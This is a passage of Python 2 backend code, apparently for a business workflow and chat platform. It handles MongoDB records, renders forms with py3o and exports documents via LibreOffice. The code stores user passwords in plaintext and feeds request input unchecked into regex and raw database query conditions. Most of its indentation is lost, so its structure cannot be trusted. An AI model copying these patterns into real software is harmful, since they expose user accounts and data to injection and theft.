collection = get_collection(gConfig['combiz_platform']['mongodb']['collection_workflow'])
if querydict.has_key('_id'):
existone = collection.find_one({'_id':db_util.add_mongo_id(querydict['_id'])})
if existone:
collection.update({'_id':existone['_id']}, {'$set': db_util.add_mongo_id(querydict)}, multi=False, upsert=False)
one = collection.find_one(db_util.add_mongo_id({'_id':existone['_id']}))
ret = json.dumps(db_util.remove_mongo_id(one), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_update_workflow_not_exist' }, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_update_id_required' }, ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'workflow_update_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_update_fail' }, ensure_ascii=True, indent=4)
return ret
def workflow_delete(querydict):
ret = ''
try:
collection = get_collection(gConfig['combiz_platform']['mongodb']['collection_workflow'])
if querydict.has_key('_id'):
if isinstance(querydict['_id'], str) or isinstance(querydict['_id'], unicode):
existone = collection.find_one({'_id':db_util.add_mongo_id(querydict['_id'])})
if existone:
collection.remove({'_id':existone['_id']})
ret = json.dumps(db_util.remove_mongo_id(existone), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_delete_workflow_not_exist' }, ensure_ascii=True, indent=4)
if isinstance(querydict['_id'], list):
ids = db_util.add_mongo_id(querydict['_id'])
cond = {'_id':{'$in':ids}}
collection.remove(cond)
ret = json.dumps(db_util.remove_mongo_id(querydict['_id']), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_delete_id_required' }, ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'workflow_delete_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_delete_fail' }, ensure_ascii=True, indent=4)
return ret
def workflow_template_add(querydict):
ret = ''
if querydict.has_key('name') \
and querydict.has_key('nodes') \
and querydict.has_key('edges'):
try:
collection = get_collection(gConfig['combiz_platform']['mongodb']['collection_workflow_template'])
existone = collection.find_one({'name':querydict['name']})
if existone:
ret = json.dumps({'result':u'workflow_template_add_name_already_exist' }, ensure_ascii=True, indent=4)
else:
_id = collection.save(db_util.add_mongo_id(querydict))
o = collection.find_one({'_id':_id})
ret = json.dumps(db_util.remove_mongo_id(o), ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'workflow_template_add_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_template_add_fail' }, ensure_ascii=True, indent=4)
else:
if not querydict.has_key('name'):
ret = json.dumps({'result':u'workflow_template_add_name_required' }, ensure_ascii=True, indent=4)
if not querydict.has_key('nodes'):
ret = json.dumps({'result':u'workflow_template_add_nodes_required' }, ensure_ascii=True, indent=4)
if not querydict.has_key('edges'):
ret = json.dumps({'result':u'workflow_template_add_edges_required' }, ensure_ascii=True, indent=4)
return ret
def workflow_template_query(querydict):
ret = ''
o = None
try:
collection = get_collection(gConfig['combiz_platform']['mongodb']['collection_workflow_template'])
o = None
limit = 10
skip = 0
ssort = None
cond = {}
if querydict.has_key('limit'):
limit = int(querydict['limit'])
if querydict.has_key('offset'):
skip = int(querydict['offset'])
if querydict.has_key('order'):
ssort = []
if querydict['order'] == 'asc':
ssort = [('name', pymongo.ASCENDING),]
if querydict['order'] == 'desc':
ssort = [('name', pymongo.DESCENDING),]
if querydict.has_key('name'):
if '*' in querydict['name']:
cond = {'name': {'$regex':'^.*' + querydict['name'].replace('*', '') + '.*$'}}
o = list(collection.find(cond, skip=skip, limit=limit, sort=ssort))
else:
o = collection.find_one({'name':querydict['name']})
elif querydict.has_key('_id'):
o = collection.find_one({'_id':db_util.add_mongo_id(querydict['_id'])})
if o:
ret = json.dumps(db_util.remove_mongo_id(o), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_template_query_workflow_not_exist' }, ensure_ascii=True, indent=4)
else:
ssort = None
cond = {}
if querydict.has_key('search_field') and querydict.has_key('search'):
cond = {str(querydict['search_field']): {'$regex':'^.*' + querydict['search'].replace('*', '') + '.*$'}}
if querydict.has_key('order'):
ssort = []
if querydict['order'] == 'asc':
ssort = [(str(querydict['search_field']), pymongo.ASCENDING),]
if querydict['order'] == 'desc':
ssort = [(str(querydict['search_field']), pymongo.DESCENDING),]
o = list(collection.find(cond, skip=skip, limit=limit, sort=ssort))
ret = json.dumps(db_util.remove_mongo_id(o), ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'workflow_template_query_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_template_query_fail' }, ensure_ascii=True, indent=4)
return ret
def workflow_template_update(querydict):
ret = ''
try:
collection = get_collection(gConfig['combiz_platform']['mongodb']['collection_workflow_template'])
if querydict.has_key('_id'):
existone = collection.find_one({'_id':db_util.add_mongo_id(querydict['_id'])})
if existone:
collection.update({'_id':existone['_id']}, {'$set': db_util.add_mongo_id(querydict)}, multi=False, upsert=False)
one = collection.find_one({'_id':existone['_id']})
ret = json.dumps(db_util.remove_mongo_id(one), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_template_update_workflow_not_exist' }, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_template_update_id_required' }, ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'workflow_template_update_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_template_update_fail' }, ensure_ascii=True, indent=4)
return ret
def workflow_template_delete(querydict):
ret = ''
try:
            collection = get_collection(gConfig['combiz_platform']['mongodb']['collection_workflow_template'])
if querydict.has_key('_id'):
if isinstance(querydict['_id'], str) or isinstance(querydict['_id'], unicode):
existone = collection.find_one({'_id':db_util.add_mongo_id(querydict['_id'])})
if existone:
collection.remove({'_id':existone['_id']})
ret = json.dumps(db_util.remove_mongo_id(existone), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_template_delete_workflow_not_exist' }, ensure_ascii=True, indent=4)
if isinstance(querydict['_id'], list):
ids = db_util.add_mongo_id(querydict['_id'])
cond = {'_id':{'$in':ids}}
collection.remove(cond)
ret = json.dumps(db_util.remove_mongo_id(querydict['_id']), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_template_delete_id_required' }, ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'workflow_template_delete_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_template_delete_fail' }, ensure_ascii=True, indent=4)
return ret
def get_form(form_id):
global gFormTemplate
ret = None
for i in gFormTemplate:
if i['form_path'] == form_id:
ret = i
break
return ret
def get_out_tmp_dir(dirname):
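        # Create (if needed) <dirname>/export_tmp plus a unique per-run subdirectory inside it,
        # named from the current timestamp and a UUID, and return that path.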
out_dir = os.path.join(dirname, 'export_tmp')
if not os.path.exists(out_dir):
os.mkdir(out_dir)
now = time.strftime('%Y-%m-%d %H:%M:%S')[:19].replace('-','').replace(' ','').replace(':','')
out_dir = os.path.join(out_dir, '%s-%s' % ( now , uuid.uuid4()))
if not os.path.exists(out_dir):
os.mkdir(out_dir)
return out_dir
def form_blank(querydict):
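        # Serve the blank (unfilled) document of a form template, converted to the requested
        # format (pdf by default). form_templates/list.json is loaded lazily into the global
        # gFormTemplate cache on first use.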
global gFormTemplate
ret = ''
content_type = 'text/json'
filename = None
if len(gFormTemplate) == 0:
p = os.path.join(STATICRESOURCE_DIR, 'form_templates', 'list.json')
if os.path.exists(p):
try:
with open(p, 'r') as f:
f1 = gevent.fileobject.FileObjectThread(f, 'r')
gFormTemplate = json.loads(f1.read())
except:
ret = json.dumps({'result':u'form_blank_list_json_parse_error'}, ensure_ascii=True, indent=4)
return ret, content_type, filename
else:
ret = json.dumps({'result':u'form_blank_list_json_not_exist'}, ensure_ascii=True, indent=4)
return ret, content_type, filename
if querydict.has_key('form_id'):
form = get_form(querydict['form_id'])
if form and form.has_key('blank_document'):
out_path = form['blank_document']
out_path = os.path.join(STATICRESOURCE_DIR, out_path)
if os.path.exists(out_path):
ext = 'pdf'
if querydict.has_key('format'):
ext = querydict['format']
ret,content_type = form_export(out_path, ext)
if querydict.has_key('attachmentdownload') and querydict['attachmentdownload'] is True:
filename = os.path.basename(form['blank_document'])
filename = filename[:filename.rindex('.')]
filename = '%s%s.%s' % (filename , u'(空白)', ext)
else:
ret = json.dumps({'result':u'form_blank_generated_document_not_exist'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'form_blank_blank_document_need_specify_in_list_json'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'form_blank_form_id_required'}, ensure_ascii=True, indent=4)
return ret, content_type, filename
def form_fill(querydict):
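        # Look up the workflow identified by querydict, take the form_data stored under the
        # requested form_id, render it into that form's template document and return the
        # exported result (optionally as an attachment download).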
global gFormTemplate
def check_is_bool(form, fld):
ret = False
if form.has_key('bool') and isinstance(form['bool'], list):
for i in form['bool']:
if i == fld:
ret = True
break
return ret
def chinese_date(value):
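            # Turn a 'YYYY-MM-DD HH:MM:SS' string into the Chinese date form 'YYYY年MM月DD日'
            # (the time part is dropped); any other value is returned unchanged.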
ret = value
if len(ret) == 19 :
if ret[4] == u'-' and ret[7] == u'-' and ret[10] == u' ':
ret1 = ret[:4]
ret1 += u'年'
ret1 += ret[5:7]
ret1 += u'月'
ret1 += ret[8:10]
ret1 += u'日'
ret = ret1
return ret
def check_is_image(form, fld):
ret = False
if form.has_key('image') and isinstance(form['image'], list):
for i in form['image']:
if i == fld:
ret = True
break
return ret
def check_is_list(form, fld):
ret = False
if form.has_key('list') and isinstance(form['list'], list):
for i in form['list']:
if i == fld:
ret = True
break
return ret
def fill_tpl(form, form_data):
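            # Render the form's template with py3o: boolean fields become checked/unchecked
            # boxes, list fields become repeated Py3oItem rows, image fields are downloaded
            # from the file service (with a no-photo placeholder on failure), and all other
            # values are passed through chinese_date().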
template_document = os.path.join(STATICRESOURCE_DIR, form['template_document'])
dirname = os.path.dirname(template_document)
basename = os.path.basename(template_document)
basename = basename.replace('_template', '')
out_dir = get_out_tmp_dir(dirname)
out_path = os.path.join(out_dir, basename)
t = Template(template_document, out_path)
data = {}
document = Py3oItem()
file_service_url = '%s://%s:%s/fileservice/rest/file/' % (gConfig['combiz_platform']['proxy_file']['protocol'], gConfig['combiz_platform']['proxy_file']['host'], gConfig['combiz_platform']['proxy_file']['port'])
for k in form_data.keys():
#listobj = check_is_list(form, k)
if check_is_bool(form, k):
if form_data[k] is True:
setattr(document, k, u'\u2611')
if form_data[k] is False:
setattr(document, k, u'\u2610')
elif check_is_list(form, k):
data[k] = []
for i in form_data[k]:
item = Py3oItem()
for kk in i.keys():
setattr(item, kk, chinese_date(i[kk]))
data[k].append(item)
elif check_is_image(form, k):
out_path1 = os.path.join(out_dir, form_data[k])
url = URL(file_service_url + form_data[k])
client = HTTPClient.from_url(url)
try:
response = client.get(url.request_uri)
if hasattr(response, 'status_code') and (response.status_code == 200 or response.status_code == 304):
with open(out_path1, 'wb') as f:
f1 = gevent.fileobject.FileObjectThread(f, 'wb')
f1.write(response.read())
if os.path.exists(out_path1):
t.set_image_path(k, out_path1)
except Exception,e:
print(e)
out_path1 = os.path.join(STATICRESOURCE_DIR, 'form_templates', 'document', 'no-photo.jpg')
t.set_image_path(k, out_path1)
else:
setattr(document, k, chinese_date(form_data[k]))
data['document'] = document
#print(dir(data))
t.render(data)
return out_path
ret = ''
content_type = 'text/json'
filename = None
if len(gFormTemplate) == 0:
p = os.path.join(STATICRESOURCE_DIR, 'form_templates', 'list.json')
if os.path.exists(p):
try:
with open(p, 'r') as f:
f1 = gevent.fileobject.FileObjectThread(f, 'r')
gFormTemplate = json.loads(f1.read())
except:
ret = json.dumps({'result':u'form_fill_list_json_parse_error'}, ensure_ascii=True, indent=4)
return ret, content_type, filename
else:
ret = json.dumps({'result':u'form_fill_list_json_not_exist'}, ensure_ascii=True, indent=4)
return ret, content_type, filename
o = json.loads(workflow_query(querydict))
if o.has_key('result'):
ret = json.dumps(o, ensure_ascii=True, indent=4)
else:
if querydict.has_key('form_id'):
if o.has_key('form_data') and isinstance(o['form_data'], dict):
if querydict['form_id'] in o['form_data'].keys():
form_data = o['form_data'][querydict['form_id']]
form = get_form(querydict['form_id'])
if form and form.has_key('template_document'):
out_path = fill_tpl(form, form_data)
if os.path.exists(out_path):
ext = 'pdf'
if querydict.has_key('format'):
ext = querydict['format']
ret, content_type = form_export(out_path, ext)
if querydict.has_key('attachmentdownload') and querydict['attachmentdownload'] is True:
filename = os.path.basename(form['template_document']).replace('_template', '')
filename = filename[:filename.rindex('.')]
filename = '%s%s.%s' % (filename , u'(已填)', ext)
else:
ret = json.dumps({'result':u'form_fill_generated_document_not_exist'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'form_fill_template_document_need_specify_in_list_json'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'form_fill_form_id_not_exist'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'form_fill_form_data_is_none'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'form_fill_form_id_required'}, ensure_ascii=True, indent=4)
return ret, content_type, filename
def form_export(src, ext):
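        # Convert src into the requested format (pdf/doc/docx/html) by invoking headless
        # LibreOffice with --convert-to, then return the exported bytes and a matching
        # Content-Type, or a JSON error if the output file is missing.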
dirname = os.path.dirname(src)
out_dir = get_out_tmp_dir(dirname)
out_path = os.path.basename(src)
idx = out_path.rindex('.')
out_path = out_path[:idx+1] + ext
out_path = os.path.join(out_dir, out_path)
        ret = json.dumps({'result':'unsupported export format.'}, ensure_ascii=True, indent=4)
content_type = 'text/json'
format = 'pdf'
if ext == 'pdf':
#format = 'pdf:writer pdf Export'
format = 'pdf'
content_type = 'application/pdf'
elif ext == 'doc':
format = 'doc:MS Word 97'
content_type = 'application/msword'
elif ext == 'docx':
format = 'docx:MS Word 2007 XML'
content_type = 'application/vnd.openxmlformats-officedocument.wordprocessingml.document'
elif ext == 'html':
format = 'html:XHTML Writer File'
content_type = 'text/html'
encfunc = enc
if sys.platform == 'win32':
encfunc = enc1
cmd = [
encfunc(gConfig['combiz_platform']['libreoffice']['executable_path']),
'--headless',
'--convert-to',
format,
'--outdir',
encfunc(out_dir),
encfunc(src)
]
output = check_output(cmd)
print(output)
#if len(output.strip())>0:
#ret = json.dumps({'result':output}, ensure_ascii=True, indent=4)
#content_type = 'text/json'
if not os.path.exists(out_path):
            ret = json.dumps({'result':'export failed: file does not exist.'}, ensure_ascii=True, indent=4)
content_type = 'text/json'
if os.path.exists(out_path):
with open(out_path, 'rb') as f:
f1 = gevent.fileobject.FileObjectThread(f, 'rb')
ret = f1.read()
return ret, content_type
def check_url_token(querydict):
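        # When security.enable_url_md5_check is enabled, require _token to equal
        # md5(md5prefix + '_|_' + current 'YYYYMMDDHH'), i.e. the token rotates every hour.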
is_token_pass = False
enable_url_md5_check = False
md5prefix = ''
if gConfig['combiz_platform'].has_key('security') \
and gConfig['combiz_platform']['security'].has_key('md5prefix'):
md5prefix = str(gConfig['combiz_platform']['security']['md5prefix'])
if gConfig['combiz_platform'].has_key('security') \
and gConfig['combiz_platform']['security'].has_key('enable_url_md5_check') \
and gConfig['combiz_platform']['security']['enable_url_md5_check'].lower() == 'true':
enable_url_md5_check = True
else:
is_token_pass = True
if enable_url_md5_check:
print('checking token...')
if querydict.has_key('_token'):
plain = '%s_|_%s' % (md5prefix, time.strftime('%Y%m%d%H'))
token = md5.new(plain).hexdigest()
if token == str(querydict['_token']):
is_token_pass = True
return is_token_pass
headers = {}
headers['Content-Type'] = 'text/json;charset=' + ENCODING
statuscode = '200 OK'
body = ''
isnew = False
urls = gUrlMap.bind_to_environ(environ)
querydict, buf = get_querydict_by_GET_POST(environ)
try:
endpoint, args = urls.match()
if args.has_key('_id'):
querydict['_id'] = args['_id']
if endpoint not in []:
if not check_url_token(querydict):
body = json.dumps({'result': u'invalid_token'}, ensure_ascii=True, indent=4)
return statuscode, headers, body
if querydict.has_key('_token'):
del querydict['_token']
if endpoint == 'workflow_add':
body = workflow_add(querydict)
elif endpoint == 'workflow_query':
body = workflow_query(querydict)
elif endpoint == 'workflow_update':
body = workflow_update(querydict)
elif endpoint == 'workflow_delete':
body = workflow_delete(querydict)
elif endpoint == 'workflow_template_add':
body = workflow_template_add(querydict)
elif endpoint == 'workflow_template_query':
body = workflow_template_query(querydict)
elif endpoint == 'workflow_template_update':
body = workflow_template_update(querydict)
elif endpoint == 'workflow_template_delete':
body = workflow_template_delete(querydict)
elif endpoint == 'workflow_form_fill':
body, content_type, filename = form_fill(querydict)
headers['Content-Type'] = content_type
if filename:
headers['Content-Disposition'] = 'attachment;filename="' + enc(filename) + '"'
elif endpoint == 'workflow_form_blank':
body, content_type, filename = form_blank(querydict)
headers['Content-Type'] = content_type
if filename:
headers['Content-Disposition'] = 'attachment;filename="' + enc(filename) + '"'
else:
body = json.dumps({'result':u'access_deny'}, ensure_ascii=True, indent=4)
except HTTPException, e:
body = json.dumps({'result':u'access_deny'}, ensure_ascii=True, indent=4)
return statuscode, headers, body
def handle_chat_platform(environ, session):
global ENCODING
global gConfig, gRequest, gSessionStore, gUrlMap, gSecurityConfig, gWebSocketsMap, gJoinableQueue
def get_collection(collection):
ret = None
db_util.mongo_init_client('chat_platform')
db = db_util.gClientMongo['chat_platform'][gConfig['chat_platform']['mongodb']['database']]
if not collection in db.collection_names(False):
ret = db.create_collection(collection)
else:
ret = db[collection]
return ret
def user_query(session, querydict):
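        # Query chat users by username and/or _id (plain value, list, or raw mongo condition),
        # honouring limit/skip; with user_detail=True each record is annotated with an
        # online/offline status derived from the open websocket map.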
ret = []
collection = get_collection(gConfig['chat_platform']['mongodb']['collection_users'])
q = {}
limit = 0
skip = 0
user_detail = False
if querydict.has_key('user_detail') and querydict['user_detail'] is True:
user_detail = True
del querydict['user_detail']
if querydict.has_key('limit'):
limit = int(querydict['limit'])
del querydict['limit']
if querydict.has_key('skip'):
skip = int(querydict['skip'])
del querydict['skip']
if querydict.has_key('username'):
if isinstance(querydict['username'], str) or isinstance(querydict['username'], unicode):
q['username'] = querydict['username']
if isinstance(querydict['username'], list):
q['username'] = {'$in': querydict['username']}
if isinstance(querydict['username'], dict):
q['username'] = querydict['username']
if querydict.has_key('_id'):
if isinstance(querydict['_id'], str) or isinstance(querydict['_id'], unicode):
q['_id'] = db_util.add_mongo_id(querydict['_id'])
if isinstance(querydict['_id'], list):
q['_id'] = {'$in': [db_util.add_mongo_id(i) for i in querydict['_id']]}
if isinstance(querydict['_id'], dict):
q['_id'] = querydict['_id']
rec = list(collection.find(q).limit(limit).skip(skip))
keys = gWebSocketsMap.keys()
for i in rec:
if user_detail:
if str(i['_id']) in keys:
i['online_status'] = 'online'
else:
i['online_status'] = 'offline'
ret.append(i)
return ret
def group_query(session, querydict={}):
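        # Query chat groups by group_name and/or _id, honouring limit/skip; with
        # user_detail=True the member id list is expanded into user records (passwords and
        # contact lists stripped) together with their online status.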
ret = []
collection = get_collection(gConfig['chat_platform']['mongodb']['collection_groups'])
q = {}
limit = 0
skip = 0
if querydict.has_key('limit'):
limit = int(querydict['limit'])
del querydict['limit']
if querydict.has_key('skip'):
skip = int(querydict['skip'])
del querydict['skip']
if querydict.has_key('group_name'):
if isinstance(querydict['group_name'], str) or isinstance(querydict['group_name'], unicode):
q['group_name'] = querydict['group_name']
if isinstance(querydict['group_name'], list):
q['group_name'] = {'$in': querydict['group_name']}
if isinstance(querydict['group_name'], dict):
q['group_name'] = querydict['group_name']
if querydict.has_key('_id'):
if isinstance(querydict['_id'], str) or isinstance(querydict['_id'], unicode):
q['_id'] = querydict['_id']
if isinstance(querydict['_id'], list):
q['_id'] = {'$in': querydict['_id']}
ret = list(collection.find(db_util.add_mongo_id(q)).limit(limit).skip(skip))
if querydict.has_key('user_detail') and querydict['user_detail'] is True:
keys = gWebSocketsMap.keys()
for i in ret:
idx = ret.index(i)
detail = []
userlist = user_query(session, {'_id':i['members']})
for j in userlist:
if j.has_key('contacts'):
del j['contacts']
if j.has_key('password'):
del j['password']
if str(j['_id']) in keys:
j['online_status'] = 'online'
else:
j['online_status'] = 'offline'
detail.append(j)
ret[idx]['members'] = detail
return ret
def group_get(session, querydict):
rec = group_query(session, querydict)
if len(rec)>0:
ret = json.dumps(db_util.remove_mongo_id(rec), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'query_no_record'}, ensure_ascii=True, indent=4)
return ret
def user_group_get(session, querydict):
ret = []
collection = get_collection(gConfig['chat_platform']['mongodb']['collection_groups'])
q = {}
if querydict.has_key('username'):
if isinstance(querydict['username'], str) or isinstance(querydict['username'], unicode) or isinstance(querydict['username'], dict):
q['username'] = querydict['username']
if querydict.has_key('_id'):
if isinstance(querydict['_id'], str) or isinstance(querydict['_id'], unicode):
q['_id'] = db_util.add_mongo_id(querydict['_id'])
if len(q.keys())>0:
users = user_query(session, querydict)
if len(users)>0:
user0 = users[0]
_id = user0['_id']
grps = group_query(session)
for i in grps:
if i.has_key('members') and _id in i['members']:
ret.append(i)
ret = json.dumps(db_util.remove_mongo_id(ret), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'user_group_get_user_not_exist'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'user_group_get_one_user_required'}, ensure_ascii=True, indent=4)
return ret
def all_user_get(session, querydict):
limit = 0
skip = 0
filter_str = ''
if querydict.has_key('user_detail') and querydict['user_detail'] is True:
user_detail = True
del querydict['user_detail']
if querydict.has_key('limit'):
try:
limit = int(querydict['limit'])
except:
pass
del querydict['limit']
if querydict.has_key('skip'):
try:
skip = int(querydict['skip'])
except:
pass
del querydict['skip']
if querydict.has_key('filter'):
filter_str = querydict['filter']
del querydict['filter']
contactlist = user_query(session, {'username':{'$regex': '^.*' + filter_str + '.*$'}, 'limit':limit, 'skip':skip})
ret = []
keys = gWebSocketsMap.keys()
for i in contactlist:
for k in i.keys():
if not k in ['_id', 'username', 'display_name', 'avatar']:
del i[k]
if str(i['_id']) in keys:
i['online_status'] = 'online'
else:
i['online_status'] = 'offline'
ret.append(i)
ret = json.dumps(db_util.remove_mongo_id(ret), ensure_ascii=True, indent=4)
return ret
def user_contact_get(session, querydict):
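        # Return one user's contact list (user looked up by username or _id) as JSON; with
        # user_detail=True the contact ids are expanded into user records with online status,
        # optionally narrowed by a 'filter' substring on the username.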
ret = []
collection = get_collection(gConfig['chat_platform']['mongodb']['collection_users'])
q = {}
if querydict.has_key('username'):
if isinstance(querydict['username'], str) or isinstance(querydict['username'], unicode):
q['username'] = querydict['username']
del querydict['username']
if querydict.has_key('_id'):
if isinstance(querydict['_id'], str) or isinstance(querydict['_id'], unicode):
q['_id'] = db_util.add_mongo_id(querydict['_id'])
del querydict['_id']
if len(q.keys())>0:
contacts = []
selfid = None
rec = collection.find_one(q)
if rec and rec.has_key('contacts'):
# contacts = rec['contacts']
contacts = [db_util.add_mongo_id(i) for i in rec['contacts']]
ret = contacts
selfid = rec['_id']
limit = 0
skip = 0
user_detail = False
if querydict.has_key('user_detail') and querydict['user_detail'] is True:
user_detail = True
del querydict['user_detail']
if querydict.has_key('limit'):
try:
limit = int(querydict['limit'])
except:
pass
del querydict['limit']
if querydict.has_key('skip'):
try:
skip = int(querydict['skip'])
except:
pass
del querydict['skip']
if user_detail:
if querydict.has_key('filter'):
contactlist = user_query(session, {'username':{'$regex': '^.*' + querydict['filter'] + '.*$'}, '_id': {'$in':contacts, '$ne':selfid}, 'limit':limit, 'skip':skip})
del querydict['filter']
else:
contactlist = user_query(session, {'_id':contacts, 'limit':limit, 'skip':skip})
ret = []
keys = gWebSocketsMap.keys()
for i in contactlist:
if i.has_key('contacts'):
del i['contacts']
if i.has_key('password'):
del i['password']
if str(i['_id']) in keys:
i['online_status'] = 'online'
else:
i['online_status'] = 'offline'
ret.append(i)
ret = json.dumps(db_util.remove_mongo_id(ret), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'user_contact_query_one_user_required'}, ensure_ascii=True, indent=4)
return ret
def user_get(session, querydict):
ret = ''
rec = user_query(session, querydict)
for i in rec:
idx = rec.index(i)
if i.has_key('contacts'):
del i['contacts']
if i.has_key('password'):
del i['password']
rec[idx] = i
if len(rec)>0:
ret = json.dumps(db_util.remove_mongo_id(rec), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'query_no_record'}, ensure_ascii=True, indent=4)
return ret
def user_add(session, querydict):
ret = ''
if querydict.has_key('username') and querydict.has_key('password') and len(querydict['username'])>0 and len(querydict['password'])>0:
try:
collection = get_collection(gConfig['chat_platform']['mongodb']['collection_users'])
existone = collection.find_one({'username':querydict['username']})
if existone:
ret = json.dumps({'result':u'user_add_fail_username_already_exist'}, ensure_ascii=True, indent=4)
else:
obj = {}
obj['username'] = querydict['username']
obj['display_name'] = querydict['username']
obj['password'] = querydict['password']
ts = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
obj['register_date'] = ts
obj['update_date'] = ts
obj['description'] = ''
obj['person_info'] = {}
obj['contacts'] = []
obj['avatar'] = None
if querydict.has_key('person_info') :
obj['person_info'] = querydict['person_info']
if querydict.has_key('contacts') and isinstance(querydict['contacts'], list):
obj['contacts'] = querydict['contacts']
if querydict.has_key('avatar') and len(querydict['avatar']) > 0:
obj['avatar'] = querydict['avatar']
_id = collection.save(db_util.add_mongo_id(obj))
rec = collection.find_one({'_id':_id})
ret = json.dumps(db_util.remove_mongo_id(rec), ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'user_add_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'user_add_fail' }, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'user_add_fail_username_password_required'}, ensure_ascii=True, indent=4)
return ret
def user_update(session, querydict):
ret = ''
if querydict.has_key('_id') and len(querydict['_id'])>0:
try:
_id = db_util.add_mongo_id(querydict['_id'])
collection = get_collection(gConfig['chat_platform']['mongodb']['collection_users'])
existone = collection.find_one({'_id':_id})
if existone:
del querydict['_id']
querydict['update_date'] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
collection.update({'_id':existone['_id']}, {'$set': db_util.add_mongo_id(querydict)}, multi=False, upsert=False)
one = collection.find_one({'_id':_id})
ret = json.dumps(db_util.remove_mongo_id(one), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'user_update_user_not_exist'}, ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'user_update_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'user_update_fail' }, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'user_update_fail_user_id_required'}, ensure_ascii=True, indent=4)
return ret
def user_delete(session, querydict):
ret = ''
if querydict.has_key('_id') and len(querydict['_id'])>0:
try:
collection = get_collection(gConfig['chat_platform']['mongodb']['collection_users'])
existone = collection.find_one({'_id':db_util.add_mongo_id(querydict['_id'])})
if existone:
collection.remove({'_id':existone['_id']})
ret = json.dumps(db_util.remove_mongo_id(existone), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'user_remove_user_not_exist'}, ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'user_remove_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'user_remove_fail' }, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'user_remove_fail_user_id_required'}, ensure_ascii=True, indent=4)
return ret
def group_add(session, querydict):
ret = ''
if querydict.has_key('owner_id')\
and len(querydict['owner_id']) > 0\
and querydict.has_key('group_name')\
and len(querydict['group_name']) > 0:
try:
collection = get_collection(gConfig['chat_platform']['mongodb']['collection_groups'])
existone = collection.find_one({'group_name':querydict['group_name']})
if existone:
ret = json.dumps({'result':u'group_add_fail_group_name_already_exist'}, ensure_ascii=True, indent=4)
else:
obj = {}
obj['owner_id'] = querydict['owner_id']
obj['group_name'] = querydict['group_name']
ts = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
obj['found_date'] = ts
obj['update_date'] = ts
obj['members'] = [db_util.add_mongo_id(obj['owner_id']), ]
if querydict.has_key('avatar') and len(querydict['avatar']) > 0:
obj['avatar'] = querydict['avatar']
if querydict.has_key('description') and len(querydict['description']) > 0:
obj['description'] = querydict['description']
_id = collection.save(db_util.add_mongo_id(obj))
rec = collection.find_one({'_id':_id})
ret = json.dumps(db_util.remove_mongo_id(rec), ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'group_add_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'group_add_fail' }, ensure_ascii=True, indent=4)
else:
if not querydict.has_key('owner_id') or len(querydict['owner_id']) == 0:
ret = json.dumps({'result':u'group_add_fail_owner_id_required'}, ensure_ascii=True, indent=4)
if not querydict.has_key('group_name') or len(querydict['group_name']) == 0:
ret = json.dumps({'result':u'group_add_fail_group_name_required'}, ensure_ascii=True, indent=4)
return ret
